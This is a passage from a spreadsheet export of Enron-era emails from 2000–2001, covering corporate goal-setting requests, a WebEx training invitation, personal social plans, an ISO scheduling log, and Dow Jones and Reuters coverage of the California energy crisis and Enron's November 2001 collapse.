Here is the latest edition - after Plains legal and managerial review of the_x000D_
revised edition you sent us.  Plains is ready to sign pending your review._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - enroncomm-rnc revision.doc_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 08:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>re: 2001 Goals &amp; Objectives</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Rod Hayslett/FGT/Enron on 12/11/2000 _x000D_
04:25 PM ---------------------------_x000D_
_x000D_
_x000D_
Cindy Stark_x000D_
12/07/2000 04:07 PM_x000D_
To: Bill Cordes/NPNG/Enron@ENRON, Shelley Corman/ET&amp;S/Enron@ENRON, Steve _x000D_
Hotte/Corp/Enron@ENRON, Rod Hayslett/FGT/Enron@ENRON, Phil _x000D_
Lowry/OTS/Enron@ENRON, Danny McCarty/ET&amp;S/Enron@Enron, Rockford _x000D_
Meyer/FGT/Enron@ENRON, Michael Moran/ET&amp;S/Enron@ENRON, Gary P _x000D_
Smith/OTS/Enron@ENRON, Julia White/ET&amp;S/Enron@ENRON, James _x000D_
Prentice/GPGFIN/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: re: 2001 Goals &amp; Objectives_x000D_
_x000D_
Please disregard the "middle" message to Bill Cordes and note the below _x000D_
request from Stan for your 2001 Goals &amp; Objectives to be received in our _x000D_
office by MONDAY, December 11.   I don't believe we've received a single one _x000D_
yet., and Stan wanted me to remind everyone._x000D_
_x000D_
Thanks,_x000D_
Cindy_x000D_
_x000D_
---------------------- Forwarded by Cindy Stark/Corp/Enron on 12/07/2000 _x000D_
04:01 PM ---------------------------_x000D_
_x000D_
_x000D_
Cindy Stark_x000D_
11/27/2000 12:18 PM_x000D_
To: Bill Cordes/NPNG/Enron@ENRON_x000D_
cc: Virginia O'Neill/NPNG/Enron@Enron _x000D_
Subject: re: 2001 Goals &amp; Objectives_x000D_
_x000D_
Hello, Bill!    This was sent out during my absence, and I see that your name _x000D_
was inadvertently omitted from the distribution.   Sorry about that!_x000D_
_x000D_
Cindy_x000D_
_x000D_
---------------------- Forwarded by Cindy Stark/Corp/Enron on 11/27/2000 _x000D_
12:16 PM ---------------------------_x000D_
_x000D_
_x000D_
Stanley Horton_x000D_
11/20/2000 02:19 PM_x000D_
Sent by: Cindy Stark_x000D_
To: Danny McCarty/ET&amp;S/Enron@Enron, Rod Hayslett/FGT/Enron@ENRON, Michael _x000D_
Moran/ET&amp;S/Enron@ENRON, Phil Lowry/OTS/Enron@ENRON, Gary P _x000D_
Smith/EWC/Enron@ENRON, Shelley Corman/ET&amp;S/Enron@ENRON, Steve _x000D_
Hotte/Corp/Enron@ENRON, James Prentice/GPGFIN/Enron@ENRON, Julia _x000D_
White/ET&amp;S/Enron@ENRON_x000D_
cc: Cindy Stark/Corp/Enron@ENRON _x000D_
Subject: re: 2001 Goals &amp; Objectives_x000D_
_x000D_
I would like to see a first draft of the 2001 Goals &amp; Objectives by December _x000D_
11, 2000._x000D_
_x000D_
I specifically would like to see goals dealing with the following:_x000D_
_x000D_
1.) Resolution of the Navajo Right -of- way issue;_x000D_
2.) Development of a specific business plan for NNG's South End;_x000D_
3.) Timetable for TW's new expansion;_x000D_
4.) Timetable for the completion of FGT's Phase IV, Phase V, and PhaseVI;_x000D_
5.) Pipeline safety legislation;_x000D_
6.) Divesting of Enron's clean fuels business;_x000D_
7.) Business developments efforts;_x000D_
8.) NNG's Equivalent Unit Risk Account  (how do we get our money back now !); _x000D_
and,_x000D_
9.) E-Commerce Strategy._x000D_
_x000D_
_x000D_
We will discuss further at up-coming staff meetings._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 14:14:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'e-mail &lt;.zeke@enron.com&gt;', 'e-mail &lt;.jondawonda@enron.com&gt;', 'jason.wolfe@enron.com', 'e-mail &lt;.guidroz@enron.com&gt;', 'e-mail &lt;.brandon@enron.com&gt;', 'e-mail &lt;.reilly@enron.com&gt;', 'e-mail &lt;.mike@enron.com&gt;', 'e-mail &lt;.supahfrrrreak@enron.com&gt;', 'e-mail &lt;.robbyn@enron.com&gt;', 'e-mail &lt;.josh@enron.com&gt;', 'e-mail &lt;.marisha@enron.com&gt;'})</t>
  </si>
  <si>
    <t>FW: A Little Proof</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
To:_x000D_
Subject:_x000D_
Date: Thu, 17 May 2001 16:25:07 -0500_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2653.19)_x000D_
Content-Type: multipart/related;	boundary="----_=_NextPart_002_01C0DF16.658EB620";	type="multipart/alternative"_x000D_
_x000D_
_x000D_
This  is a proof that "Girls are Evil"_x000D_
 _x000D_
 _x000D_
 _x000D_
 Hai  Tran 	 Senior  Designer 	 [IMAGE] 	_x000D_
 [IMAGE] 	   	   	_x000D_
 Office:512.226.7024 	 Fax:512.480.0416 	 Email:hai.tran@enform.com 	_x000D_
_x000D_
_x000D_
 _x000D_
 _x000D_
 - image001.gif _x000D_
 - image002.gif _x000D_
 - GE.gif </t>
  </si>
  <si>
    <t>Wed, 16 May 2001 06:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'swestgate@enporion.com'})</t>
  </si>
  <si>
    <t>Meeting Invitation from Steve Westgate</t>
  </si>
  <si>
    <t>Judt Townsend,_x000D_
_x000D_
Steve Westgate has invited you to join a meeting on the Web, using WebEx._x000D_
_x000D_
-------------------------_x000D_
TO JOIN THE MEETING_x000D_
-------------------------_x000D_
On 5/18/2001, at 12:00PM, (GMT -04:00) Eastern Time, USA &amp; Canada (DayLight _x000D_
Time),_x000D_
click this URL:_x000D_
_x000D_
http://enporion.webex.com/webex/e.php?AT=JE&amp;EventID=408266&amp;UUID=191911_x000D_
_x000D_
The password is: keyspan_x000D_
_x000D_
-------------------------_x000D_
FIRST TIME USERS_x000D_
-------------------------_x000D_
For fully interactive meetings, including the ability_x000D_
to present your documents and applications, a one-time_x000D_
setup takes less than 10 minutes._x000D_
_x000D_
To set up now, go to:_x000D_
_x000D_
http://enporion.webex.com/join/_x000D_
_x000D_
Then click New User._x000D_
_x000D_
.-------------------------_x000D_
MEETING SUMMARY_x000D_
-------------------------_x000D_
Name: Keyspan capacity release auction training_x000D_
Date: 5/18/2001_x000D_
Time: 12:00PM, (GMT -04:00) Eastern Time, USA &amp; Canada (DayLight Time)_x000D_
Meeting Number: 231497285_x000D_
Meeting Password: keyspan_x000D_
Teleconference:  None_x000D_
Agenda:_x000D_
_x000D_
Host:_x000D_
Steve Westgate_x000D_
1(813)8648133x8133_x000D_
mailto:swestgate@enporion.com_x000D_
_x000D_
_x000D_
http://www.webex.com_x000D_
We've got to start meeting like this(TM)</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 02:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'weldonvc@hotmail.com'})</t>
  </si>
  <si>
    <t>Super Bowl</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by V Charles Weldon/HOU/ECT on 01/26/2001 _x000D_
10:00 AM ---------------------------_x000D_
_x000D_
_x000D_
Margaret Jones &lt;mjones@gc.edu&gt; on 01/26/2001 09:48:49 AM_x000D_
To: v.charles.weldon@enron.com_x000D_
cc:  _x000D_
Subject: Super Bowl_x000D_
_x000D_
_x000D_
Charlie, I don't know if you'll have any plans for the superbowl but if_x000D_
you would like to come to Galveston you are more than welcome.  We will_x000D_
be at Pop's house - Jimmy's brothers will be there - we are going to_x000D_
plan the menu this evening but last night Mitchell and I decided some_x000D_
nice heavy h'or'dourves (sp?) might be nice - and anything Mitchell_x000D_
cooks is really worth the dive.  Anyway let me know.  Love, Margaret_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Nov 2001 15:09:45 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'siva66@mail.ev1.net', 'frthis@aol.com', 'markm@cajunusa.com', 'klyn@pdq.net', 'martier@cpchem.com', 'wolphguy@aol.com'})</t>
  </si>
  <si>
    <t>RE: seeing as mark won't answer my e-mails....</t>
  </si>
  <si>
    <t xml:space="preserve">well i will chime in on the "who the hell lives out there comment"_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"siva66" &lt;siva66@mail.ev1.net&gt;@ENRON  _x000D_
Sent:	Wednesday, November 07, 2001 5:08 PM_x000D_
To:	siva66@mail.ev1.net; MarkM@cajunusa.com; Wolphguy@aol.com; martier@cpchem.com; Frthis@aol.com; Kevin_x000D_
Cc:	Rs1119@aol.com; Quigley, Dutch; john_riches@msn.com; jramirez@othon.com; bwdunlavy@yahoo.com_x000D_
Subject:	Re: seeing as mark won't answer my e-mails...._x000D_
_x000D_
you can never be too much of an ass kevin._x000D_
_x000D_
_x000D_
---------- Original Message ----------------------------------_x000D_
From: "Kevin" &lt;klyn@pdq.net&gt;_x000D_
Date: Wed, 7 Nov 2001 16:47:11 -0600_x000D_
_x000D_
&gt;Not to be too much of an ass, but who in the hell lives near_x000D_
Kingwood other_x000D_
&gt;then my Great Aunt?_x000D_
&gt;_x000D_
&gt;----- Original Message -----_x000D_
&gt;From: "siva66" &lt;siva66@mail.ev1.net&gt;_x000D_
&gt;To: &lt;siva66@mail.ev1.net&gt;; &lt;MarkM@cajunusa.com&gt;;_x000D_
&lt;Wolphguy@aol.com&gt;;_x000D_
&gt;&lt;martier@cpchem.com&gt;; &lt;klyn@pdq.net&gt;; &lt;Frthis@aol.com&gt;_x000D_
&gt;Cc: &lt;Rs1119@aol.com&gt;; &lt;Dutch.Quigley@enron.com&gt;;_x000D_
&lt;john_riches@msn.com&gt;;_x000D_
&gt;&lt;jramirez@othon.com&gt;; &lt;bwdunlavy@yahoo.com&gt;_x000D_
&gt;Sent: Wednesday, November 07, 2001 4:33 PM_x000D_
&gt;Subject: Re: seeing as mark won't answer my e-mails...._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;&gt; so, how many do we have?_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt; ---------- Original Message ----------------------------------_x000D_
&gt;&gt; From: Frthis@aol.com_x000D_
&gt;&gt; Date: Wed, 7 Nov 2001 16:57:00 EST_x000D_
&gt;&gt;_x000D_
&gt;&gt; &gt;Kingwood Cove it is!_x000D_
&gt;&gt; &gt;Sunday_x000D_
&gt;&gt; &gt;Tee Time(s):  8:06 and 8:12_x000D_
&gt;&gt; &gt;Cost - $33 (includes cart) - that will be be $66 for Mr. 2700_x000D_
&gt;&gt; Huevos._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;ernie_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;Anyone need directions?_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt; _________________________________________________________________x000D_
&gt;&gt; Sent via the EV1 webmail system at mail.ev1.net_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
_________________________________________________________________x000D_
Sent via the EV1 webmail system at mail.ev1.net_x000D_
_x000D_
_x000D_
_x000D_
                   </t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 21:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/25/01; HourAhead hour: 5;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/25/01; HourAhead hour: 5;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Load schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042505.txt_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 5 / Preferred:   1.96 / Final:   1.93)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE4_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/25/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 15:26:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'m..driscoll@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">   BY MARK GOLDEN                                                               _x000D_
   A DOW JONES NEWSWIRES COLUMN                                                 _x000D_
                                                                                _x000D_
   NEW YORK (DOW JONES)--THE CALIFORNIA SENATE IN SACRAMENTO PASSED A           _x000D_
WINDFALL-PROFITS TAX ON SALES OF ELECTRICITY INTO THE STATE'S WHOLESALE         _x000D_
ELECTRICITY MARKET MONDAY AFTERNOON AT 4:50 P.M. PDT. AT ALMOST EXACTLY THE SAME_x000D_
TIME, CALIFORNIA INDEPENDENT SYSTEM OPERATOR INITIATED ROLLING BLACKOUTS FOR THE_x000D_
FIRST TIME SINCE MARCH.                                                         _x000D_
   COINCIDENCE? PROBABLY, BUT THE CONNECTION SHOULDN'T BE IGNORED.              _x000D_
   "THE POLICY DECISIONS THAT HAVE BEEN ADOPTED IN CALIFORNIA TO DATE HAVE      _x000D_
ACCELERATED AN ALREADY SERIOUS MARKET COLLAPSE," SAID A HARVARD UNIVERSITY STUDY_x000D_
OF CALIFORNIA'S ENERGY CRISIS LATE LAST MONTH.                                  _x000D_
   THIS WEEK'S WINDFALL-PROFITS TAX BILL IS THE LATEST BLUNT INSTRUMENT WIELDED _x000D_
WITH POTENTIALLY DISASTROUS RESULTS. GOV. GRAY DAVIS WANTED IT AS A STICK WHEN  _x000D_
                                                                          (CONT)_x000D_
MEETING WITH EXECUTIVES FROM THE STATE'S MERCHANT POWER COMPANIES WEDNESDAY. THE_x000D_
MANEUVER WAS LESS THAN ADROIT, AND THE GENERATORS WEREN'T IMPRESSED.            _x000D_
   AFTER THE MEETING WITH DAVIS, RELIANT ENERGY'S (REI) JOHN STOUT SAID THAT IF _x000D_
THE TAX WERE IMPLEMENTED IN CALIFORNIA, IT WOULD "INSTANTLY BLACK OUT ALL THE   _x000D_
GENERATION IN THE STATE."                                                       _x000D_
   THE STATE'S LEADERS MIGHT KEEP IN MIND WHO WIELDS THE BIGGER STICK AT THIS   _x000D_
POINT. CALIFORNIA SET UP A MARKET IN WHICH SELLERS HAVE BEEN ABLE TO CHARGE VERY_x000D_
HIGH PRICES FOR ELECTRICITY SINCE SUPPLIES STARTED GETTING TIGHT A YEAR AGO.    _x000D_
SELLERS SAY THEY HAVE PLAYED BY THE RULES THEY WERE GIVEN, AND NOBODY HAS PROVED_x000D_
OTHERWISE WITH THE ONE EXCEPTION OF A FINE PAID BY WILLIAMS COMPANIES (WMB) FOR _x000D_
ONE PARTICULAR INSTANCE OF VIOLATING A CONTRACT.                                _x000D_
   "IT'S LIKE SOMEBODY INVENTED A NEW GAME, INVITED YOU OVER TO PLAY AND THEN   _x000D_
CHANGED THE RULES A COUPLE OF TIMES IN THE MIDDLE OF THE GAME. THEN, AFTER YOU  _x000D_
BEAT THEM, THEY INSIST YOU CHEATED," SAID ONE WESTERN ENERGY TRADER.            _x000D_
   ALMOST EVERY ATTEMPT BY THE BUY SIDE - THE UTILITIES, THE ISO AND NOW THE    _x000D_
                                                                          (CONT)_x000D_
STATE TREASURY - TO LOWER PRICES HAS RESULTED IN HIGHER PRICES OR BLACKOUTS OR  _x000D_
BOTH. THE WINDFALL-PROFITS TAX IDEA IS THE MOST RECENT EXAMPLE, BUT THOSE WHO   _x000D_
INSIST ON PRICE CAPS SHOULD KEEP THIS IN MIND: THE ISO HAS HAD PRICE CAPS SINCE _x000D_
IT BEGAN OPERATION MORE THAN THREE YEARS AGO. OBVIOUSLY, PRICE CAPS HAVEN'T     _x000D_
WORKED, JUST AS THEY HAVE NEVER WORKED EXCEPT DURING WARTIME.                   _x000D_
   IN FACT, PRICE CAPS HAVE BEEN A QUESTIONABLE MEDICINE PRESCRIBED FOR THE     _x000D_
WRONG DISEASE. AT BEST, PRICE CAPS MIGHT RESTRICT PRICE SPIKES. CALIFORNIA'S    _x000D_
PROBLEM IS PERPETUAL HIGH PRICES. IT CAN'T AFFORD THE GOING RATE AT NIGHTTIME,  _x000D_
LET ALONE THE HIGHER MARKET PRICES DURING THE AFTERNOONS IN A HEATWAVE.         _x000D_
   CALIFORNIA MUST FIGURE OUT HOW TO PLAY BETTER THE GAME IT INVENTED. THE      _x000D_
INSANELY COMPLICATED COMPUTER-BASED PURCHASING OF POWER ENDED A FEW MONTHS AGO, _x000D_
AFTER THE CALIFORNIA POWER EXCHANGE WAS CLOSED DOWN BY FEDERAL REGULATORS AND   _x000D_
THE ISO LOST ITS FINANCIAL ABILITY TO BUY POWER. THE MATCH BETWEEN THE PROGRAMS _x000D_
AND THE ENERGY TRADERS WASN'T EXACTLY IBM'S "BIG BLUE" VERSUS GARRY KASPAROV.   _x000D_
   ALMOST EVERYONE IN THE MARKET AGREES THAT THE UTILITIES' HUMAN TRADERS COULD _x000D_
                                                                          (CONT)_x000D_
HAVE BOUGHT NEEDED POWER FOR BILLIONS OF DOLLARS LESS THAN THE PROGRAMS THAT THE_x000D_
UTILITIES WERE REQUIRED TO USE BY STATE LAW.                                    _x000D_
   SINCE THE DEMISE OF PROGRAMMED PURCHASING, THE COMPUTERS HAVE BEEN REPLACED  _x000D_
BY HUMANS, BUT WITHOUT MUCH BETTER RESULTS. THE TEAM ASSEMBLED TO BUY TENS OF   _x000D_
MILLIONS OF DOLLARS WORTH OF SPOT POWER EVERY DAY CONSISTS MOSTLY OF FORMER     _x000D_
EMPLOYEES OF THE POWER EXCHANGE AND ISO, AS WELL AS EXPENSIVE CONSULTANTS WITH  _x000D_
NO ENERGY TRADING EXPERIENCE. ONE OF THE LEADERS OF THE TRADING TEAM, FOR       _x000D_
EXAMPLE, IS A FORMER PUBLIC RELATIONS DIRECTOR FOR THE POWER EXCHANGE WITH NO   _x000D_
TRADING EXPERIENCE PRIOR TO THE CURRENT JOB.                                    _x000D_
   AS ONE ISO EMPLOYEE WAS WONT TO SAY: "IT'S LIKE WATCHING A FOOTBALL GAME     _x000D_
BETWEEN NOTRE DAME AND ST. MARY'S SCHOOL FOR UNWED MOTHERS."                    _x000D_
   AND THE SIGNING OF TENS OF BILLIONS OF DOLLARS OF FIVE- AND 10-YEAR CONTRACTS_x000D_
IS BEING EXECUTED MAINLY BY FORMER EXECUTIVES OF SOUTHERN CALIFORNIA EDISON -   _x000D_
PEOPLE THAT LEFT THE UTILITY YEARS AGO TO BECOME CONSULTANTS AND ALSO DON'T HAVE_x000D_
TRADING EXPERIENCE.                                                             _x000D_
   GOOD IDEAS, MEANWHILE, HAVE LANGUISHED.                                (CONT)_x000D_
   "WE ARE GOING TO INSTALL METERS IN EVERY MAJOR COMMERCIAL CONCERN IN THE     _x000D_
STATE THIS SUMMER AND GO TO REAL-TIME PRICING," DAVIS TOLD WALL STREET ANALYSTS _x000D_
ON FEB. 28.                                                                     _x000D_
   THAT PROPOSAL WAS GREETED BY MANY OBSERVERS AS THE MOST CONSTRUCTIVE IDEA    _x000D_
FROM THE GOVERNOR'S OFFICE TO DATE.                                             _x000D_
   WHAT HAS HAPPENED TO REAL-TIME PRICING FOR CALIFORNIA'S BIG BUSINESSES SINCE _x000D_
THEN? NOTHING.                                                                  _x000D_
   "THE PROBLEM IS THAT EVERYBODY IN CALIFORNIA IS 'SPECIAL'," SAID STANFORD    _x000D_
ECONOMIST AND CALIFORNIA ISO CONSULTANT FRANK WOLAK. EVERY INDUSTRY FROM OIL    _x000D_
REFINERS TO INTERNET SERVER FARMS HAS HAD LOBBYISTS IN SACRAMENTO SUCCESSFULLY  _x000D_
SECURING EXCEPTIONS TO THE RULE.                                                _x000D_
   "MY POINT HAS BEEN THAT IF WHAT THEY DO IS SO VALUABLE, THEN THEY SHOULD BE  _x000D_
ABLE TO HANDLE THE HIGHER PRICES. BUSINESSES WITH ABOUT 10,000 MEGAWATTS OF LOAD_x000D_
HAVE REAL-TIME METERS. EVERY ONE OF THEM SHOULD BE GETTING MARKET PRICES," SAID _x000D_
WOLAK.                                                                          _x000D_
                                                                          (CONT)_x000D_
   ONE OF THE GREATEST ADVANTAGES THAT SELLERS OF ELECTRICITY TO CALIFORNIA HAVE_x000D_
HAD IS THAT CONSUMERS HAVE FIXED PRICES, SO DEMAND IS INFLEXIBLE. SELLERS KNOW  _x000D_
EXACTLY HOW MUCH ELECTRICITY THE UTILITIES MUST BUY BASED ON TEMPERATURES AND   _x000D_
THE TIME OF DAY, WOLAK SAYS, AND THEY SIMPLY SUPPLY THE MARKET JUST ENOUGH POWER_x000D_
AT HIGH MARGINAL PRICES.                                                        _x000D_
   REDUCING OVERALL CONSUMPTION THROUGH HIGHER RATES WILL HELP THE STATE SOME,  _x000D_
BUT MAKING 25% OF DEMAND FLEXIBLE BASED ON PRICE WOULD GIVE THE STATE A FIGHTING_x000D_
CHANCE IN THE MARKET, ACCORDING TO WOLAK.                                       _x000D_
   BUT THAT, APPARENTLY, IS TOO COMPLICATED OR POLITICALLY DIFFICULT. PRICE     _x000D_
CAPS, A WINDFALL-PROFITS TAX AND POLITICAL PATRONAGE JOBS FOR BUYING BILLIONS OF_x000D_
DOLLARS OF POWER MAY NOT SAVE THE STATE FROM BANKRUPTCY, BUT THEY ARE EASIER TO _x000D_
SELL - OR SLIP THROUGH - IN SACRAMENTO.                                         _x000D_
   -BY MARK GOLDEN, DOW JONES NEWSWIRES; 201-938-4604; MARK.GOLDEN@DOWJONES.COM _x000D_
                                                </t>
  </si>
  <si>
    <t>Fri, 9 Nov 2001 13:50:35 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">USA: Enron CEO sold $1.2 mln in Compaq shares._x000D_
Reuters English News Service, 11/09/01_x000D_
'Arbs' Sit Out Possible Dynergy-Enron Deal, For Now_x000D_
Dow Jones News Service, 11/09/01_x000D_
POWER POINTS: Does Dynegy Know What It's Getting Into?_x000D_
Dow Jones Energy Service, 11/09/01_x000D_
USA: UPDATE 1-Enron's rating cut, woes finally hit trading floor._x000D_
Reuters English News Service, 11/09/01_x000D_
USA: U.S. stocks crawl higher but profit warnings weigh._x000D_
Reuters English News Service, 11/09/01_x000D_
UK: UK power prices gain, take strength from gas._x000D_
Reuters English News Service, 11/09/01_x000D_
Play of the Day: Dynegy Close To Buying Beleaguered Enron_x000D_
CNNfn: Halftime Report, 11/09/01_x000D_
Indian court restrains Enron from serving termination notice over power project_x000D_
Associated Press Newswires, 11/09/01_x000D_
Source: Dynegy close to deal to buy Enron_x000D_
Associated Press Newswires, 11/09/01_x000D_
USA: UPDATE 1-Enron, Dynegy shares jump on talk deal is near._x000D_
Reuters English News Service, 11/09/01_x000D_
Indian Court Bars Enron From Terminating Power Project_x000D_
Dow Jones International News, 11/09/01_x000D_
USA: Enron faces lawsuits seeking class action status._x000D_
Reuters English News Service, 11/09/01_x000D_
USA: ANALYSIS-Enron seen test of U.S. SEC's course under Pitt._x000D_
Reuters English News Service, 11/09/01_x000D_
USA: Dynegy close to complete deal to buy Enron-WSJ._x000D_
Reuters English News Service, 11/09/01_x000D_
Can Bandwidth Market Survive Without Independent Enron?_x000D_
Dow Jones Energy Service, 11/09/01_x000D_
INDIA: Enron's Dabhol suffers legal setback in Indian row._x000D_
Reuters English News Service, 11/09/01_x000D_
Dynegy Nears Deal to Buy Enron in $7 Billion Stock Transaction_x000D_
Dow Jones Business News, 11/09/01_x000D_
USA: UPDATE1-Moody's cuts Enron's ratings, may cut again._x000D_
Reuters English News Service, 11/09/01_x000D_
_x000D_
Enron long-term ratings cut to Baa3 from Baa2 - Moody's_x000D_
AFX News, 11/09/01_x000D_
Enron, Dynergy very close to deal - CNBC_x000D_
AFX News, 11/09/01_x000D_
Easton`s Call: Returns are No More_x000D_
CNNfn: Market Coverage - Morning, 11/09/01_x000D_
USA: Enron shares slip on debt downgrade concerns._x000D_
Reuters English News Service, 11/09/01_x000D_
Moody's Diaz on Enron Credit Downgrade and Outlook: Comment_x000D_
Bloomberg, 11/09/01_x000D_
_x000D_
Commerzbank Analyst Meade on Possible Buyout of Enron: Comment_x000D_
Bloomberg, 11/09/01_x000D_
_x000D_
Kent Income Fund's Mitchell Stapley on Enron Bonds: Comment_x000D_
Bloomberg, 11/09/01_x000D_
_x000D_
Harris Investment's Coxe on Possible Buyout of Enron: Comment_x000D_
Bloomberg, 11/09/01_x000D_
_x000D_
Strong American Utilities Fund's Vuchetich on Dynegy: Comment_x000D_
Bloomberg, 11/09/01_x000D_
_x000D_
Dynegy bid for Enron said to be possible bail-out deal _x000D_
Houston Business Journal, 11/09/01_x000D_
_x000D_
Dynegy May Acquire Enron for $22 Bln in Stock, Debt (Update6)_x000D_
Bloomberg, 11/09/01_x000D_
_x000D_
TransCanada PipeLines CEO on Dynegy and Enron Talks: Comment_x000D_
Bloomberg, 11/09/01_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
USA: Enron CEO sold $1.2 mln in Compaq shares._x000D_
_x000D_
11/09/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
WASHINGTON, Nov 9 (Reuters) - Enron Corp. Chairman and Chief Executive Kenneth Lay, who sits on the board of Compaq Computer Corp. , sold $1.2 million in Compaq stock last month, a regulatory filing on Friday said. _x000D_
Lay sold 124,596 common shares of Compaq on Oct. 29 for $9.25 a share, according to a filing with the Securities and Exchange Commission. He was left with 340,724 shares after the transaction, the filing added._x000D_
Compaq shares were down 25 cents to $7.74 in afternoon trading on the New York Stock Exchange. _x000D_
Compaq, whose proposed $19.5 billion merger with Hewlett-Packard Co. looks to be in doubt following opposition from the Hewlett and Packard families, did not immediately return a call seeking comment on Lay's sale. _x000D_
News of the transaction comes as Lay's company, Enron, the embattled energy marketing and trading giant, is on the verge of a bailout by a smaller rival, Dynegy Inc. _x000D_
Enron has trimmed its earnings by $591 million, or 22 percent, from 1997 to 2000, and increased its debt by $628 million, or 6 percent, in a bookkeeping revision aimed at calming a firestorm that has engulfed the company in recent weeks. _x000D_
Enron stock and credit ratings have plunged following disclosures of off-the-balance sheet deals now under investigation by the Securities and Exchange Commission for possible conflict of interest. _x000D_
The deals contributed to a $1 billion third-quarter charge and $1.2 billion reduction in shareholder equity. _x000D_
Enron shares were up 54 cents to $8.95 in afternoon trading on the NYSE. An announcement of a possible Dynegy acquisition is expected later on Friday._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
'Arbs' Sit Out Possible Dynergy-Enron Deal, For Now_x000D_
By Janet Whitman_x000D_
Of DOW JONES NEWSWIRES_x000D_
_x000D_
11/09/2001_x000D_
Dow Jones News Service_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
NEW YORK -(Dow Jones)- It's been a brutal year in the risk arbitrage business, and that has many arbitrageurs, also known as takeover traders, steering clear of bets on Dynergy Inc.'s (DYN) possible takeover of Enron Corp. (ENE). _x000D_
Some of their reluctance stems from the fact that the looming deal reported by Dow Jones Newswires has yet to be confirmed by the two Houston energy trading companies._x000D_
More worrisome, however, is the possibility that Enron - already crippled by an equity probe and a restatement of four years of earnings - may have even deeper woes to report. _x000D_
"Unless Enron is providing significantly more disclosure to the buyer than to the rest of the world, I don't see how a buyer could get comfortable." said an arbitrageur with a New York hedge fund. _x000D_
What worries takeover traders is the likelihood that any agreement would likely have extensive material adverse change, or MAC, clauses, providing plenty of room for Dynergy to exit the deal should more problems arise at Enron. _x000D_
"As an investor, it's hard for me to own something when I don't know what it is," said the arbitrageur of Enron. "I take some comfort that someone is stepping up the plate, but that's not enough for me." _x000D_
Another arbitrageur added, "If it gets announced, it's a deal with a lot of issues, starting with who bears the risk if Enron has a lot of lawsuits because of alleged accounting fraud." _x000D_
According to the Wall Street Journal, Dynergy will swap nearly 0.27 of a share of its stock for each share of Enron. Also under the deal, ChevronTexaco Corp. (CVX), which owns 26% of Dynergy, will make an immediate cash injection of $1.5 billion into the deal, and then add another billion on closing. _x000D_
Shares of Dynergy jumped more than 10% in heavy trading, bolstered by the idea that the company is picking up Enron for a steal. Its shares traded recently at $39.61, up $3.06 a share. _x000D_
An acquirer's shares typically fall after a deal has been announced, in part because arbitrageurs sell the shares short, while going long the target. In this case, however, arbitrageurs are largely on the sidelines, which is perhaps alleviating some of the downside pressure on Dynergy. _x000D_
Enron, meanwhile, traded about 4% higher recently, swapping hands at $8.77 a share in heavy volume. The stock was buoyed by the reported bid from Dynergy as well as a new credit rating from Moody's. The firm downgraded Enron's rating a notch to just above speculative, not as bad as the junk rating some had feared._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
POWER POINTS: Does Dynegy Know What It's Getting Into?_x000D_
By Mark Golden_x000D_
_x000D_
11/09/2001_x000D_
Dow Jones Energy Service_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
A Dow Jones Newswires Column _x000D_
_x000D_
NEW YORK -(Dow Jones)- If I were an executive with Dynegy Inc. (DYN), I would want to know who was buying up my stock Thursday and Friday, encouraging me that Enron is a steal at $9.50 a share._x000D_
